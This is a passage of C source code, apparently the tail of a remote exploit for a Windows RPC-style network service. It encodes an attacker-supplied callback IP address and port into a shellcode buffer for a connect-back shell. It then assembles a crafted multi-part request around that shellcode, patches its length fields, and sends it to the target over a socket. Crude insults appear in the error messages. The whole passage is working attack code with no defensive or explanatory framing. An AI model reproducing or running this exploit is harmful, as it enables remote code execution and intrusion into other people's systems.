  437. cb=inet_addr(argv[2]);   
  438. cb ^= 0x93939393;
  439. *(unsigned short *)&sc[330+0x30] = port1;
  440. *(unsigned int *)&sc[335+0x30] = cb;
  441. len=sizeof(sc);
  442. memcpy(buf2,request1,sizeof(request1));
  443. len1=sizeof(request1);
  444.  
  445. *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;
  446. *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
  447.  memcpy(buf2+len1,request2,sizeof(request2));
  448.  len1=len1+sizeof(request2);
  449.     memcpy(buf2+len1,sc,sizeof(sc));
  450.     len1=len1+sizeof(sc);
  451.     memcpy(buf2+len1,request3,sizeof(request3));
  452.     len1=len1+sizeof(request3);
  453.     memcpy(buf2+len1,request4,sizeof(request4));
  454.     len1=len1+sizeof(request4);
  455.     *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
  456.    
  457.     *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;  
  458.     *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
  459.     *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
  460.     *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
  461.     *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
  462.     *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
  463.     *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;
  464.  
  465.  
  466.  
  467.     if(send(sockfd, bindstr, sizeof(bindstr), 0)== -1){
  468.       printf("Send failed pussy.\n");
  469.       exit(1);
  470.     }
  471.  
  472.     len=recv(sockfd,buf1,1000,0);
  473.     if (send(sockfd,buf2,len1,0)==SOCKET_ERROR) {
  474.     
  475.             printf("Send failed pussy\n");
  476.             exit (1);
  477.     }
  478.     len=recv(sockfd,buf1,1024,0);
  479.     return 0;
  480. }
  481.  
  482.